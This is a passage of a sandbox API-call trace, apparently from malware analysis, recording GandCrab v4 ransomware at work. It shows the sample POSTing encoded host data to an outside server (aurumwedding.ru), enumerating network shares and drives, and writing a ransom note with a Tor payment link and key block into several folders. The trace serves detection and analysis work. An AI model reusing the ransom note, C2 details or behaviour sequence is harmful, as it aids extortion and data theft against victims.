(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0150.467] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0150.467] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0150.467] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0150.467] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0150.467] InternetConnectW (hInternet=0xcc0004, lpszServerName="aurumwedding.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0150.467] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0150.467] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="data/pics/fukedaso.jpg") returned 22 [0150.467] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="data/pics/fukedaso.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0150.467] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000, dwOptionalLength=0x24c) Thread: id = 4 os_tid = 0xe24 Thread: id = 5 os_tid = 0xe28 [0041.067] VirtualAlloc (lpAddress=0x0, dwSize=0x202, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0041.067] GetComputerNameW (in: lpBuffer=0x3000000, nSize=0x328fdc0 | out: lpBuffer="LHNIWSJ", nSize=0x328fdc0) returned 1 [0041.067] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0041.068] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x328fd98 | out: lphEnum=0x328fd98*=0xf7b4b0) returned 0x0 [0041.068] WNetEnumResourceW (in: hEnum=0xf7b4b0, lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94 | out: lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94) returned 0x103 [0041.068] WNetCloseEnum (hEnum=0xf7b4b0) returned 0x0 [0041.068] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x328fd98 | out: lphEnum=0x328fd98*=0xf8a888) returned 0x0 [0043.711] WNetEnumResourceW (in: hEnum=0xf8a888, lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94 | out: lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94) returned 0x0 [0043.712] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x3810000 [0043.714] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3010000, lphEnum=0x328fd60 | out: lphEnum=0x328fd60*=0xf7b2d0) returned 0x0 [0043.718] WNetEnumResourceW (in: hEnum=0xf7b2d0, lpcCount=0x328fd58, lpBuffer=0x3810000, lpBufferSize=0x328fd5c | out: lpcCount=0x328fd58, lpBuffer=0x3810000, lpBufferSize=0x328fd5c) returned 0x103 [0043.718] WNetCloseEnum (hEnum=0xf7b2d0) returned 0x0 [0043.837] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.838] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x3810000 [0043.838] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3010020, lphEnum=0x328fd60 | out: lphEnum=0x328fd60*=0x0) returned 0x4b8 [0057.151] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.152] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x37f0000 [0057.153] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3010040, lphEnum=0x328fd60 | out: lphEnum=0x328fd60*=0x0) returned 0x4c6 [0057.154] VirtualFree (lpAddress=0x37f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.154] WNetEnumResourceW (in: hEnum=0xf8a888, lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94 | out: lpcCount=0x328fd90, lpBuffer=0x3010000, lpBufferSize=0x328fd94) returned 0x103 [0057.154] WNetCloseEnum (hEnum=0xf8a888) returned 0x0 [0057.154] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.154] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.155] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.155] RtlExitUserThread (Status=0x0) Thread: id = 6 os_tid = 0xe2c [0041.072] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3020000 [0041.072] wsprintfW (in: param_1=0x3020000, param_2="%S" | out: param_1="C:\\") returned 3 [0041.072] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.073] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.075] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.075] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.075] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\\\KRAB-DECRYPT.txt") returned 20 [0041.076] CreateFileW (lpFileName="C:\\\\KRAB-DECRYPT.txt" (normalized: "c:\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0041.077] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.077] WriteFile (in: hFile=0x2b0, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f9a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f9a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.078] CloseHandle (hObject=0x2b0) returned 1 [0041.079] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.080] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.080] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x115)) [0041.080] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.080] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.081] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.081] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\d2ca4a08d2ca4dee3d.lock") returned 26 [0041.081] CreateFileW (lpFileName="C:\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d0 [0041.121] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.121] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.121] lstrlenW (lpString="C:\\") returned 3 [0041.121] lstrcatW (in: lpString1="C:\\", lpString2="*" | out: lpString1="C:\\*") returned="C:\\*" [0041.121] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 0xf8a188 [0041.122] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0041.122] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0041.122] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0041.122] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0041.122] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.122] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.122] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.123] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\\\KRAB-DECRYPT.txt") returned 33 [0041.123] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\KRAB-DECRYPT.txt" (normalized: "c:\\$recycle.bin\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0041.123] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.123] WriteFile (in: hFile=0x2d8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.124] CloseHandle (hObject=0x2d8) returned 1 [0041.125] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.125] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.125] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x147)) [0041.125] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.125] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.126] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.126] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock") returned 39 [0041.126] CreateFileW (lpFileName="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\$recycle.bin\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d8 [0041.128] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.128] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.128] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0041.128] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0041.128] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xf8a088 [0041.128] lstrcmpW (lpString1=".", 